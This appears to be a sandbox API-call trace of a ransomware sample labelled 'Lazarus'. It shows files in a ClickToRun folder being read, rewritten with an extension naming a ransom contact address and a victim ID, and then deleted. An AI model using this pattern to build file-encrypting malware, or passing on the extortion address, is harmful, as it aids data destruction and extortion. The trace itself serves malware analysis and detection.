ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.890] GetLastError () returned 0x0 [0089.890] SetLastError (dwErrCode=0x0) [0089.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0089.926] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0xcc0, lpOverlapped=0x0) returned 1 [0089.926] GetLastError () returned 0x0 [0089.926] SetLastError (dwErrCode=0x0) [0089.926] GetLastError () returned 0x0 [0089.926] SetLastError (dwErrCode=0x0) [0089.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0089.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0089.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0089.926] CloseHandle (hObject=0x418) returned 1 [0089.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0089.928] CloseHandle (hObject=0x360) returned 1 [0089.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.929] AreFileApisANSI () returned 1 [0089.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0089.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0089.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0089.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.930] GetFileType (hFile=0x360) returned 0x1 [0089.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0089.930] GetLastError () returned 0xb7 [0089.930] SetLastError (dwErrCode=0xb7) [0089.930] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0089.931] CloseHandle (hObject=0x360) returned 1 [0089.932] AreFileApisANSI () returned 1 [0089.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0089.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0089.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0089.932] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll")) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0089.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.933] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0089.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0089.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0089.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.934] AreFileApisANSI () returned 1 [0089.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 91 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0089.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0089.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.945] AreFileApisANSI () returned 1 [0089.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0089.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0089.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0089.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.946] GetFileType (hFile=0x418) returned 0x1 [0089.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.946] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.946] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.946] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.946] CloseHandle (hObject=0x418) returned 1 [0089.946] AreFileApisANSI () returned 1 [0089.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0089.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0089.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0089.947] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.947] GetFileType (hFile=0x418) returned 0x1 [0089.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.947] CloseHandle (hObject=0x418) returned 1 [0089.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0090.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0090.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0090.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0090.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0090.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0090.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0090.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0090.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0090.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0090.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0090.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0090.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0090.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0090.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0090.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0090.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0090.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0090.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0090.016] AreFileApisANSI () returned 1 [0090.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0090.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0090.016] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0090.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.016] AreFileApisANSI () returned 1 [0090.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0090.017] GetLastError () returned 0x0 [0090.017] SetLastError (dwErrCode=0x0) [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0090.017] GetLastError () returned 0x0 [0090.017] SetLastError (dwErrCode=0x0) [0090.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a8c0 [0090.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0090.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.017] AreFileApisANSI () returned 1 [0090.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0090.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x132) returned 0x4e568 [0090.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=153 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 153 [0090.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.019] GetFileType (hFile=0x418) returned 0x1 [0090.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.019] AreFileApisANSI () returned 1 [0090.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 